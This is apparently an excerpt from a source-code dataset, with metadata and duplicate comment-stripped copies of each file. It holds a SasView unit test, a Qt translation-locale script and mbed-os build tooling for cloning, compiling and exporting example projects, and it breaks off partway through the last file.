"PortTimestamp",
)
| true | true |
f72eb800bacb5e3e23d6174f7e147ea13700f6c0 | 1,887 | py | Python | test/sascalculator/utest_sas_gen.py | llimeht/sasview | d0c10746a2397c5021ed8bbc842ba99243a9b0ac | [
"BSD-3-Clause"
] | null | null | null | test/sascalculator/utest_sas_gen.py | llimeht/sasview | d0c10746a2397c5021ed8bbc842ba99243a9b0ac | [
"BSD-3-Clause"
] | null | null | null | test/sascalculator/utest_sas_gen.py | llimeht/sasview | d0c10746a2397c5021ed8bbc842ba99243a9b0ac | [
"BSD-3-Clause"
] | null | null | null | """
Unit tests for the sas_gen
"""
import os.path
import warnings
warnings.simplefilter("ignore")
import unittest
import numpy as np
from sas.sascalc.calculator import sas_gen
def find(filename):
return os.path.join(os.path.dirname(__file__), 'data', filename)
class sas_gen_test(unittest.TestCase):
def setUp(self):
self.sldloader = sas_gen.SLDReader()
self.pdbloader = sas_gen.PDBReader()
self.omfloader = sas_gen.OMFReader()
def test_sldreader(self):
"""
Test .sld file loaded
"""
f = self.sldloader.read(find("sld_file.sld"))
self.assertEqual(f.pos_x[0], -40.5)
self.assertEqual(f.pos_y[0], -13.5)
self.assertEqual(f.pos_z[0], -13.5)
def test_pdbreader(self):
"""
Test .pdb file loaded
"""
f = self.pdbloader.read(find("c60.pdb"))
self.assertEqual(f.pos_x[0], -0.733)
self.assertEqual(f.pos_y[0], -1.008)
self.assertEqual(f.pos_z[0], 3.326)
def test_omfreader(self):
"""
Test .omf file loaded
"""
f = self.omfloader.read(find("A_Raw_Example-1.omf"))
output = sas_gen.OMF2SLD()
output.set_data(f)
self.assertEqual(f.mx[0], 0)
self.assertEqual(f.my[0], 0)
self.assertEqual(f.mz[0], 0)
self.assertEqual(output.pos_x[0], 0.0)
self.assertEqual(output.pos_y[0], 0.0)
self.assertEqual(output.pos_z[0], 0.0)
def test_calculator(self):
"""
Test that the calculator calculates.
"""
f = self.omfloader.read(find("A_Raw_Example-1.omf"))
omf2sld = sas_gen.OMF2SLD()
omf2sld.set_data(f)
model = sas_gen.GenSAS()
model.set_sld_data(omf2sld.output)
x = np.linspace(0, 0.1, 11)[1:]
model.runXY([x, x])
if __name__ == '__main__':
unittest.main()
| 25.5 | 68 | 0.594065 |
import os.path
import warnings
warnings.simplefilter("ignore")
import unittest
import numpy as np
from sas.sascalc.calculator import sas_gen
def find(filename):
return os.path.join(os.path.dirname(__file__), 'data', filename)
class sas_gen_test(unittest.TestCase):
def setUp(self):
self.sldloader = sas_gen.SLDReader()
self.pdbloader = sas_gen.PDBReader()
self.omfloader = sas_gen.OMFReader()
def test_sldreader(self):
f = self.sldloader.read(find("sld_file.sld"))
self.assertEqual(f.pos_x[0], -40.5)
self.assertEqual(f.pos_y[0], -13.5)
self.assertEqual(f.pos_z[0], -13.5)
def test_pdbreader(self):
f = self.pdbloader.read(find("c60.pdb"))
self.assertEqual(f.pos_x[0], -0.733)
self.assertEqual(f.pos_y[0], -1.008)
self.assertEqual(f.pos_z[0], 3.326)
def test_omfreader(self):
f = self.omfloader.read(find("A_Raw_Example-1.omf"))
output = sas_gen.OMF2SLD()
output.set_data(f)
self.assertEqual(f.mx[0], 0)
self.assertEqual(f.my[0], 0)
self.assertEqual(f.mz[0], 0)
self.assertEqual(output.pos_x[0], 0.0)
self.assertEqual(output.pos_y[0], 0.0)
self.assertEqual(output.pos_z[0], 0.0)
def test_calculator(self):
f = self.omfloader.read(find("A_Raw_Example-1.omf"))
omf2sld = sas_gen.OMF2SLD()
omf2sld.set_data(f)
model = sas_gen.GenSAS()
model.set_sld_data(omf2sld.output)
x = np.linspace(0, 0.1, 11)[1:]
model.runXY([x, x])
if __name__ == '__main__':
unittest.main()
| true | true |
f72eb81e6b4626299dd47b3dfad9d67bad9b3205 | 629 | py | Python | contrib/qt_translations.py | TheFreedomCoin/Freedom-Coin | e679946333f7090ea2afaab213419d31d5e91870 | [
"MIT"
] | 2 | 2018-06-15T08:41:56.000Z | 2018-11-01T05:37:50.000Z | contrib/qt_translations.py | TheFreedomCoin/sentinel2repo | e679946333f7090ea2afaab213419d31d5e91870 | [
"MIT"
] | null | null | null | contrib/qt_translations.py | TheFreedomCoin/sentinel2repo | e679946333f7090ea2afaab213419d31d5e91870 | [
"MIT"
] | 7 | 2018-05-10T19:09:51.000Z | 2021-06-26T18:12:26.000Z | #!/usr/bin/env python
# Helpful little script that spits out a comma-separated list of
# language codes for Qt icons that should be included
# in binary transfer distributions
import glob
import os
import re
import sys
if len(sys.argv) != 3:
sys.exit("Usage: %s $QTDIR/translations $FreedomcoinDIR/src/qt/locale"%sys.argv[0])
d1 = sys.argv[1]
d2 = sys.argv[2]
l1 = set([ re.search(r'qt_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d1, 'qt_*.qm')) ])
l2 = set([ re.search(r'Freedomcoin_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d2, 'Freedomcoin_*.qm')) ])
print ",".join(sorted(l1.intersection(l2)))
| 27.347826 | 116 | 0.688394 |
import glob
import os
import re
import sys
if len(sys.argv) != 3:
sys.exit("Usage: %s $QTDIR/translations $FreedomcoinDIR/src/qt/locale"%sys.argv[0])
d1 = sys.argv[1]
d2 = sys.argv[2]
l1 = set([ re.search(r'qt_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d1, 'qt_*.qm')) ])
l2 = set([ re.search(r'Freedomcoin_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d2, 'Freedomcoin_*.qm')) ])
print ",".join(sorted(l1.intersection(l2)))
| false | true |
f72eb836bf1ae0ede245207bbaad409be8cbc77e | 22,844 | py | Python | tools/test/examples/examples_lib.py | Eric-A-Marks/mbed-os | 4ba07d9413fbf7bae2db97a06e4eb4f275063d93 | [
"Apache-2.0"
] | 2 | 2021-01-28T09:12:02.000Z | 2021-01-28T11:03:26.000Z | tools/test/examples/examples_lib.py | Eric-A-Marks/mbed-os | 4ba07d9413fbf7bae2db97a06e4eb4f275063d93 | [
"Apache-2.0"
] | 7 | 2019-04-11T10:12:18.000Z | 2020-10-27T12:54:57.000Z | tools/test/examples/examples_lib.py | Eric-A-Marks/mbed-os | 4ba07d9413fbf7bae2db97a06e4eb4f275063d93 | [
"Apache-2.0"
] | 2 | 2016-07-21T12:40:27.000Z | 2016-07-22T11:29:19.000Z | #!/usr/bin/env python
"""
Copyright (c) 2017-2019 ARM Limited. All rights reserved.
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations
"""
import os
from os.path import dirname, abspath, basename, join, normpath
import os.path
import sys
import copy
import stat
import subprocess
from shutil import rmtree
import json
import logging
logging.basicConfig(level=logging.DEBUG, format='[EXAMPLES]> %(levelname)-8s %(message)s')
""" Import and bulid a bunch of example programs
This library includes functions that are shared between the examples.py and
the update.py modules.
"""
MBED_OS_ROOT = abspath(dirname(dirname(dirname(dirname(__file__)))))
CWD = os.getcwd()
sys.path.insert(0, MBED_OS_ROOT)
from tools.build_api import get_mbed_official_release
from tools.targets import TARGET_MAP
from tools.export import EXPORTERS
from tools.project import EXPORTER_ALIASES
from tools.toolchains import TOOLCHAINS
from tools.utils import write_json_to_file
from prettytable import PrettyTable
SUPPORTED_TOOLCHAINS = list(TOOLCHAINS - set(u'uARM'))
SUPPORTED_IDES = [exp for exp in list(EXPORTERS) + list(EXPORTER_ALIASES)
if exp != "cmsis" and exp != "zip"]
def get_table_from_pretty_table(pretty_table):
rows = []
for pretty_row in pretty_table:
row = {}
for key in pretty_table.field_names:
pretty_row.border = False
pretty_row.header = False
row[key] = pretty_row.get_string(fields=[key]).strip()
rows.append(row)
return rows
def get_build_summary(results):
"""Prints to screen the complication results of example programs.
Args:
results - results of the compilation stage. which is the output of compile_repos()
Returns: Numbers of failed results
"""
pass_table = PrettyTable()
pass_table.field_names = ["EXAMPLE NAME", "TARGET", "TOOLCHAIN", "TEST GEN", "BUILD RESULT"]
pass_table.align["EXAMPLE NAME"] = "l"
fail_table = copy.deepcopy(pass_table)
failure_counter = 0
for exp, status in list(results.items()):
for summary in status[2]:
pass_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "PASSED"])
for summary in status[3]:
fail_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "FAILED"])
failure_counter+=1
print("\n\nPassed Example Compilation:")
print(pass_table)
if (failure_counter > 0):
print("\n\nFailed Example Compilation:")
print(fail_table)
print("Number of failures = %d" % failure_counter)
# output build information to json file
rows = get_table_from_pretty_table(pass_table) + get_table_from_pretty_table(fail_table)
with open("build_data.json", "w") as write_file:
json.dump(rows, write_file, indent=4, sort_keys=True)
return failure_counter
def get_export_summary(results):
"""Prints to screen the exporting results of example programs.
Args:
results - results of the compilation stage. which is the output of and export_repos()
Returns: Numbers of failed results
"""
pass_table = PrettyTable()
pass_table.field_names = ["EXAMPLE NAME", "TARGET", "IDE", "EXPORT RESULT", "BUILD RESULT"]
pass_table.align["EXAMPLE NAME"] = "l"
fail_table = copy.deepcopy(pass_table)
failure_counter = 0
for exp, status in list(results.items()):
for summary in status[2]:
pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "PASSED"])
for summary in status[3]:
fail_table.add_row([summary["name"], summary["target"], summary["ide"], "FAILED", ""])
failure_counter+=1
for summary in status[4]:
fail_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "FAILED"])
failure_counter+=1
for summary in status[5]:
pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "SKIPPED"])
print("\n\nPassed Example Exporting:")
print(pass_table)
if (failure_counter > 0):
print("\n\nFailed Example Exporting:")
print(fail_table)
print("Number of failures = %d" % failure_counter)
return failure_counter
def valid_choices(allowed_choices, all_choices):
if len(allowed_choices) > 0:
return [t for t in all_choices if t in allowed_choices]
else:
return all_choices
def target_cross_toolchain(allowed_targets, allowed_toolchains, features=[]):
"""Generate pairs of target and toolchains
Args:
allowed_targets - a list of all possible targets
allowed_toolchains - a list of all possible toolchains
Kwargs:
features - the features that must be in the features array of a
target
"""
for target in allowed_targets:
for toolchain in allowed_toolchains:
if all(feature in TARGET_MAP[target].features
for feature in features):
yield target, toolchain
def target_cross_ide(allowed_targets, allowed_ides, features=[], toolchains=[]):
"""Generate pairs of target and ides
Args:
allowed_targets - a list of all possible targets
allowed_ides - a list of all possible IDEs
Kwargs:
features - the features that must be in the features array of a
target
"""
for target in allowed_targets:
for ide in allowed_ides:
if (EXPORTERS[ide].is_target_supported(target) and
(not toolchains or EXPORTERS[ide].TOOLCHAIN in toolchains) and
all(feature in TARGET_MAP[target].features
for feature in features)):
yield target, ide
def get_sub_examples_list(example):
""" Get the names of sub examples. if no sub examples, return the name of main example"""
sub_examples = []
if example['sub-repo-example']:
for sub in example['subs']:
sub_examples.append("%s/%s" % (example["name"], sub))
else:
sub_examples.append(example["name"])
return sub_examples
def source_repos(config, exp_filter):
""" Imports each of the repos and its dependencies (.lib files) associated
with the specific examples name from the json config file. Note if
there is already a clone of the repo then it will first be removed to
ensure a clean, up to date cloning.
Args:
config - the json object imported from the file.
"""
print("\nImporting example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
logging.warning("'%s' example directory already exists. Deleting..." % name)
rmtree(name)
cmd = "mbed-cli import %s" % example['github']
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
if result:
return result
return 0
def clone_repos(config, exp_filter , retry = 3):
""" Clones each of the repos associated with the specific examples name from the
json config file. Note if there is already a clone of the repo then it will first
be removed to ensure a clean, up to date cloning.
Args:
config - the json object imported from the file.
"""
print("\nCloning example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
logging.warning("'%s' example directory already exists. Deleting..." % name)
rmtree(name, onerror=remove_readonly)
cmd = "git clone %s" % example['github']
for i in range(0, retry):
logging.info("Executing command '%s'..." % cmd)
if not subprocess.call(cmd, shell=True):
break
else:
logging.error("unable to clone the repo '%s'" % name)
return 1
return 0
def deploy_repos(config, exp_filter):
""" If the example directory exists as provided by the json config file,
pull in the examples dependencies by using `mbed-cli deploy`.
Args:
config - the json object imported from the file.
"""
print("\nDeploying example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
os.chdir(name)
logging.info("In folder '%s'" % name)
cmd = "mbed-cli deploy"
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
os.chdir(CWD)
if result:
logging.error("mbed-cli deploy command failed for '%s'" % name)
return result
else:
logging.info("'%s' example directory doesn't exist. Skipping..." % name)
return 1
return 0
def export_repos(config, ides, targets, exp_filter):
"""Exports and builds combinations of example programs, targets and IDEs.
The results are returned in a [key: value] dictionary format:
Where key = The example name from the json config file
value = a list containing: pass_status, successes, export failures, build_failures,
and build_skips
where pass_status = The overall pass status for the export of the full
set of example programs comprising the example suite.
IE they must build and export) True if all examples pass, false otherwise
successes = list of examples that exported and built (if possible)
If the exporter has no build functionality, then it is a pass
if exported
export_failures = list of examples that failed to export.
build_failures = list of examples that failed to build
build_skips = list of examples that cannot build
Both successes and failures contain the example name, target and IDE
Args:
config - the json object imported from the file.
ides - List of IDES to export to
"""
results = {}
print("\nExporting example repos....\n")
for example in config['examples']:
if example['name'] not in exp_filter:
continue
export_failures = []
build_failures = []
build_skips = []
successes = []
exported = True
pass_status = True
if example['export']:
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
# Check that the target, IDE, and features combinations are valid and return a
# list of valid combinations to work through
for target, ide in target_cross_ide(valid_choices(example['targets'], targets),
valid_choices(example['exporters'], ides),
example['features'], example['toolchains']):
example_summary = {"name" : name, "target" : target, "ide" : ide }
summary_string = "%s %s %s" % (name, target, ide)
logging.info("Exporting %s" % summary_string)
cmd = ["mbed-cli", "export", "-i", ide, "-m", target]
logging.info("Executing command '%s'..." % " ".join(cmd))
proc = subprocess.Popen(cmd)
proc.wait()
if proc.returncode:
export_failures.append(example_summary)
logging.error("FAILURE exporting %s" % summary_string)
else:
logging.info("SUCCESS exporting %s" % summary_string)
logging.info("Building %s" % summary_string)
try:
if EXPORTERS[ide].build(name, cleanup=False):
logging.error("FAILURE building %s" % summary_string)
build_failures.append(example_summary)
else:
logging.info("SUCCESS building %s" % summary_string)
successes.append(example_summary)
except TypeError:
successes.append(example_summary)
build_skips.append(example_summary)
os.chdir(CWD)
if len(build_failures+export_failures) > 0:
pass_status= False
else:
exported = False
results[example['name']] = [exported, pass_status, successes,
export_failures, build_failures, build_skips]
return results
def compile_repos(config, toolchains, targets, profiles, verbose, exp_filter, cmake=False ,jobs=0):
"""Compiles combinations of example programs, targets and compile chains.
The results are returned in a [key: value] dictionary format:
Where key = The example name from the json config file
value = a list containing: pass_status, successes, and failures
where pass_status = The overall pass status for the compilation of the full
set of example programs comprising the example suite.
True if all examples pass, false otherwise
successes = list of passing examples.
failures = list of failing examples.
Both successes and failures contain the example name, target and compile chain
Args:
config - the json object imported from the file.
toolchains - List of toolchains to compile for.
targets - list of target names
profile - build profile path or name if in default place
verbose - enabling verbose
exp_filter - List of exp_filter to be build
jobs - Number of compile jobs
"""
results = {}
test_json = {"builds":{}}
base_path = os.getcwd()
print("\nCompiling example repos....\n")
for example in config['examples']:
if example['name'] not in exp_filter:
continue
failures = []
successes = []
compiled = True
pass_status = True
if example['test']:
if not ('baud_rate' in example and 'compare_log'in example):
logging.warning("'baud_rate' or 'compare_log' keys are missing from config json file")
example['test'] = False
if example['compile']:
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
# Check that the target, toolchain and features combinations are valid and return a
# list of valid combinations to work through
for target, toolchain in target_cross_toolchain(valid_choices(example['targets'], targets),
valid_choices(example['toolchains'], toolchains),
example['features']):
example_summary = {"name" : name, "target" : target, "toolchain" : toolchain, "test": "UNSET"}
summary_string = "%s %s %s" % (name, target, toolchain)
logging.info("Compiling %s" % summary_string)
if cmake:
build_command_seq = ["mbed-tools compile -t {} -m {} -c".format(toolchain, target)]
else:
build_command_seq = ["mbed-cli compile -t {} -m {} -j {} {}".format(toolchain, target, str(jobs), '-vv' if verbose else '') ]
if profiles:
for profile in profiles:
build_command_seq[0] += " --profile {}".format(profile)
failed_flag = False
for build_command in build_command_seq:
logging.info("Executing command '%s'..." % build_command)
proc = subprocess.Popen(build_command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
std_out, std_err = proc.communicate()
std_out = std_out.decode()
std_err = std_err.decode()
print ("\n#### STDOUT ####\n%s\n#### STDERR ####\n%s\n#### End of STDOUT/STDERR ####\n" % (std_out,std_err))
if proc.returncode:
failures.append(example_summary)
failed_flag = True
break
if not failed_flag:
if example['test']:
log = example['compare_log'].pop(0)
# example['compare_log'] is a list of log file/files, which matches each examples/sub-examples from same repo.
# pop the log file out of list regardless the compilation for each example pass of fail
image = fetch_output_image(std_out,cmake)
if image:
image_info = [{"binary_type": "bootable","path": normpath(join(name,image)),"compare_log":log}]
test_group = "{}-{}-{}".format(target, toolchain, example['baud_rate'])
if not test_group in test_json['builds']:
test_json['builds'][test_group] = {
"platform":target ,
"toolchain": toolchain ,
"base_path": base_path ,
"baud_rate": int(example['baud_rate']),
"tests":{} }
test_json['builds'][test_group]['tests'][name]={"binaries":image_info}
example_summary["test"] = "TEST_ON"
else:
logging.warning("could not find built image for example %s" % name)
example_summary["test"] = "NO_IMAGE"
else:
logging.warning("Test for %s will not be generated." % name)
example_summary["test"] = "TEST_OFF"
successes.append(example_summary)
os.chdir(CWD)
# If there are any compilation failures for the example 'set' then the overall status is fail.
if len(failures) > 0:
pass_status = False
else:
compiled = False
results[example['name']] = [compiled, pass_status, successes, failures]
write_json_to_file(test_json, "test_spec.json")
return results
def update_example_version(config, tag, exp_filter):
""" For each example repo identified in the config json object, update the version of
example to that specified by the supplied GitHub tag. This function assumes that each
example repo has already been cloned.
Args:
config - the json object imported from the file.
tag - GitHub tag corresponding to a version of mbed-os to upgrade to.
"""
print("\nUpdating example to version(branch) '%s'\n" % tag)
for example in config['examples']:
name = example['name']
if name in exp_filter:
os.chdir(name)
logging.info("In folder '%s'" % name)
cmd = "git checkout -B %s origin/%s" %(tag, tag)
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
os.chdir(CWD)
if result:
return result
return 0
def symlink_mbedos(config, path, exp_filter):
""" Create a symbolic link in each example folder to given path
If a mbed-os.lib can be found in the folder, it will be removed
"""
print("\nCreating mbed-os Symbolic link to '%s'\n" % path)
for example in config['examples']:
if example['name'] not in exp_filter:
continue
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
if os.path.exists("mbed-os.lib"):
logging.info("Replacing 'mbed-os.lib' with empty file in '%s'" % name)
open("mbed-os.lib", 'w').close()
else:
logging.warning("No 'mbed-os.lib' found in '%s'" % name)
if os.path.exists("mbed-os"):
logging.warning("'mbed-os' already existed in '%s'" % name)
else:
logging.info("Creating Symbolic link '%s'->'mbed-os'" % path)
os.symlink(path, "mbed-os")
#Cmake tool currently require 'mbed-os.lib' to be present to perform build.
#Add a empty 'mbed-os.lib' as a workaround
open('mbed-os.lib', 'a').close()
os.chdir(CWD)
return 0
def fetch_output_image(output,cmake):
"""Find the build image from the last 30 lines of a given log"""
lines = output.splitlines()
last_index = -31 if len(lines)>29 else (-1 - len(lines))
for index in range(-1,last_index,-1):
if cmake:
if lines[index].startswith("-- built:") and lines[index].endswith(".bin"):
image = lines[index][10:]
print("IMAGE is " + image)
if os.path.isfile(image):
return os.path.relpath(image)
else:
if lines[index].startswith("Image:"):
image = lines[index][7:]
if os.path.isfile(image):
return image
return False
| 42.859287 | 149 | 0.573761 |
import os
from os.path import dirname, abspath, basename, join, normpath
import os.path
import sys
import copy
import stat
import subprocess
from shutil import rmtree
import json
import logging
logging.basicConfig(level=logging.DEBUG, format='[EXAMPLES]> %(levelname)-8s %(message)s')
MBED_OS_ROOT = abspath(dirname(dirname(dirname(dirname(__file__)))))
CWD = os.getcwd()
sys.path.insert(0, MBED_OS_ROOT)
from tools.build_api import get_mbed_official_release
from tools.targets import TARGET_MAP
from tools.export import EXPORTERS
from tools.project import EXPORTER_ALIASES
from tools.toolchains import TOOLCHAINS
from tools.utils import write_json_to_file
from prettytable import PrettyTable
SUPPORTED_TOOLCHAINS = list(TOOLCHAINS - set(u'uARM'))
SUPPORTED_IDES = [exp for exp in list(EXPORTERS) + list(EXPORTER_ALIASES)
if exp != "cmsis" and exp != "zip"]
def get_table_from_pretty_table(pretty_table):
rows = []
for pretty_row in pretty_table:
row = {}
for key in pretty_table.field_names:
pretty_row.border = False
pretty_row.header = False
row[key] = pretty_row.get_string(fields=[key]).strip()
rows.append(row)
return rows
def get_build_summary(results):
pass_table = PrettyTable()
pass_table.field_names = ["EXAMPLE NAME", "TARGET", "TOOLCHAIN", "TEST GEN", "BUILD RESULT"]
pass_table.align["EXAMPLE NAME"] = "l"
fail_table = copy.deepcopy(pass_table)
failure_counter = 0
for exp, status in list(results.items()):
for summary in status[2]:
pass_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "PASSED"])
for summary in status[3]:
fail_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "FAILED"])
failure_counter+=1
print("\n\nPassed Example Compilation:")
print(pass_table)
if (failure_counter > 0):
print("\n\nFailed Example Compilation:")
print(fail_table)
print("Number of failures = %d" % failure_counter)
rows = get_table_from_pretty_table(pass_table) + get_table_from_pretty_table(fail_table)
with open("build_data.json", "w") as write_file:
json.dump(rows, write_file, indent=4, sort_keys=True)
return failure_counter
def get_export_summary(results):
pass_table = PrettyTable()
pass_table.field_names = ["EXAMPLE NAME", "TARGET", "IDE", "EXPORT RESULT", "BUILD RESULT"]
pass_table.align["EXAMPLE NAME"] = "l"
fail_table = copy.deepcopy(pass_table)
failure_counter = 0
for exp, status in list(results.items()):
for summary in status[2]:
pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "PASSED"])
for summary in status[3]:
fail_table.add_row([summary["name"], summary["target"], summary["ide"], "FAILED", ""])
failure_counter+=1
for summary in status[4]:
fail_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "FAILED"])
failure_counter+=1
for summary in status[5]:
pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "SKIPPED"])
print("\n\nPassed Example Exporting:")
print(pass_table)
if (failure_counter > 0):
print("\n\nFailed Example Exporting:")
print(fail_table)
print("Number of failures = %d" % failure_counter)
return failure_counter
def valid_choices(allowed_choices, all_choices):
if len(allowed_choices) > 0:
return [t for t in all_choices if t in allowed_choices]
else:
return all_choices
def target_cross_toolchain(allowed_targets, allowed_toolchains, features=[]):
for target in allowed_targets:
for toolchain in allowed_toolchains:
if all(feature in TARGET_MAP[target].features
for feature in features):
yield target, toolchain
def target_cross_ide(allowed_targets, allowed_ides, features=[], toolchains=[]):
for target in allowed_targets:
for ide in allowed_ides:
if (EXPORTERS[ide].is_target_supported(target) and
(not toolchains or EXPORTERS[ide].TOOLCHAIN in toolchains) and
all(feature in TARGET_MAP[target].features
for feature in features)):
yield target, ide
def get_sub_examples_list(example):
sub_examples = []
if example['sub-repo-example']:
for sub in example['subs']:
sub_examples.append("%s/%s" % (example["name"], sub))
else:
sub_examples.append(example["name"])
return sub_examples
def source_repos(config, exp_filter):
print("\nImporting example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
logging.warning("'%s' example directory already exists. Deleting..." % name)
rmtree(name)
cmd = "mbed-cli import %s" % example['github']
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
if result:
return result
return 0
def clone_repos(config, exp_filter , retry = 3):
print("\nCloning example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
logging.warning("'%s' example directory already exists. Deleting..." % name)
rmtree(name, onerror=remove_readonly)
cmd = "git clone %s" % example['github']
for i in range(0, retry):
logging.info("Executing command '%s'..." % cmd)
if not subprocess.call(cmd, shell=True):
break
else:
logging.error("unable to clone the repo '%s'" % name)
return 1
return 0
def deploy_repos(config, exp_filter):
print("\nDeploying example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
os.chdir(name)
logging.info("In folder '%s'" % name)
cmd = "mbed-cli deploy"
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
os.chdir(CWD)
if result:
logging.error("mbed-cli deploy command failed for '%s'" % name)
return result
else:
logging.info("'%s' example directory doesn't exist. Skipping..." % name)
return 1
return 0
def export_repos(config, ides, targets, exp_filter):
results = {}
print("\nExporting example repos....\n")
for example in config['examples']:
if example['name'] not in exp_filter:
continue
export_failures = []
build_failures = []
build_skips = []
successes = []
exported = True
pass_status = True
if example['export']:
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
# Check that the target, IDE, and features combinations are valid and return a
# list of valid combinations to work through
for target, ide in target_cross_ide(valid_choices(example['targets'], targets),
valid_choices(example['exporters'], ides),
example['features'], example['toolchains']):
example_summary = {"name" : name, "target" : target, "ide" : ide }
summary_string = "%s %s %s" % (name, target, ide)
logging.info("Exporting %s" % summary_string)
cmd = ["mbed-cli", "export", "-i", ide, "-m", target]
logging.info("Executing command '%s'..." % " ".join(cmd))
proc = subprocess.Popen(cmd)
proc.wait()
if proc.returncode:
export_failures.append(example_summary)
logging.error("FAILURE exporting %s" % summary_string)
else:
logging.info("SUCCESS exporting %s" % summary_string)
logging.info("Building %s" % summary_string)
try:
if EXPORTERS[ide].build(name, cleanup=False):
logging.error("FAILURE building %s" % summary_string)
build_failures.append(example_summary)
else:
logging.info("SUCCESS building %s" % summary_string)
successes.append(example_summary)
except TypeError:
successes.append(example_summary)
build_skips.append(example_summary)
os.chdir(CWD)
if len(build_failures+export_failures) > 0:
pass_status= False
else:
exported = False
results[example['name']] = [exported, pass_status, successes,
export_failures, build_failures, build_skips]
return results
def compile_repos(config, toolchains, targets, profiles, verbose, exp_filter, cmake=False ,jobs=0):
results = {}
test_json = {"builds":{}}
base_path = os.getcwd()
print("\nCompiling example repos....\n")
for example in config['examples']:
if example['name'] not in exp_filter:
continue
failures = []
successes = []
compiled = True
pass_status = True
if example['test']:
if not ('baud_rate' in example and 'compare_log'in example):
logging.warning("'baud_rate' or 'compare_log' keys are missing from config json file")
example['test'] = False
if example['compile']:
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
# Check that the target, toolchain and features combinations are valid and return a
# list of valid combinations to work through
for target, toolchain in target_cross_toolchain(valid_choices(example['targets'], targets),
valid_choices(example['toolchains'], toolchains),
example['features']):
example_summary = {"name" : name, "target" : target, "toolchain" : toolchain, "test": "UNSET"}
summary_string = "%s %s %s" % (name, target, toolchain)
logging.info("Compiling %s" % summary_string)
if cmake:
build_command_seq = ["mbed-tools compile -t {} -m {} -c".format(toolchain, target)]
else:
build_command_seq = ["mbed-cli compile -t {} -m {} -j {} {}".format(toolchain, target, str(jobs), '-vv' if verbose else '') ]
if profiles:
for profile in profiles:
build_command_seq[0] += " --profile {}".format(profile)
failed_flag = False
for build_command in build_command_seq:
logging.info("Executing command '%s'..." % build_command)
proc = subprocess.Popen(build_command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
std_out, std_err = proc.communicate()
std_out = std_out.decode()
std_err = std_err.decode()
print ("\n#### STDOUT ####\n%s\n#### STDERR ####\n%s\n#### End of STDOUT/STDERR ####\n" % (std_out,std_err))
if proc.returncode:
failures.append(example_summary)
failed_flag = True
break
if not failed_flag:
if example['test']:
log = example['compare_log'].pop(0)
# example['compare_log'] is a list of log file/files, which matches each examples/sub-examples from same repo.
# pop the log file out of list regardless the compilation for each example pass of fail
image = fetch_output_image(std_out,cmake)
if image:
image_info = [{"binary_type": "bootable","path": normpath(join(name,image)),"compare_log":log}]
test_group = "{}-{}-{}".format(target, toolchain, example['baud_rate'])
if not test_group in test_json['builds']:
test_json['builds'][test_group] = {
"platform":target ,
"toolchain": toolchain ,
"base_path": base_path ,
"baud_rate": int(example['baud_rate']),
"tests":{} }
test_json['builds'][test_group]['tests'][name]={"binaries":image_info}
example_summary["test"] = "TEST_ON"
else:
logging.warning("could not find built image for example %s" % name)
example_summary["test"] = "NO_IMAGE"
else:
logging.warning("Test for %s will not be generated." % name)
example_summary["test"] = "TEST_OFF"
successes.append(example_summary)
os.chdir(CWD)
# If there are any compilation failures for the example 'set' then the overall status is fail.
if len(failures) > 0:
pass_status = False
else:
compiled = False
results[example['name']] = [compiled, pass_status, successes, failures]
write_json_to_file(test_json, "test_spec.json")
return results
def update_example_version(config, tag, exp_filter):
print("\nUpdating example to version(branch) '%s'\n" % tag)
for example in config['examples']:
name = example['name']
if name in exp_filter:
os.chdir(name)
logging.info("In folder '%s'" % name)
cmd = "git checkout -B %s origin/%s" %(tag, tag)
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
os.chdir(CWD)
if result:
return result
return 0
def symlink_mbedos(config, path, exp_filter):
print("\nCreating mbed-os Symbolic link to '%s'\n" % path)
for example in config['examples']:
if example['name'] not in exp_filter:
continue
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
if os.path.exists("mbed-os.lib"):
logging.info("Replacing 'mbed-os.lib' with empty file in '%s'" % name)
open("mbed-os.lib", 'w').close()
else:
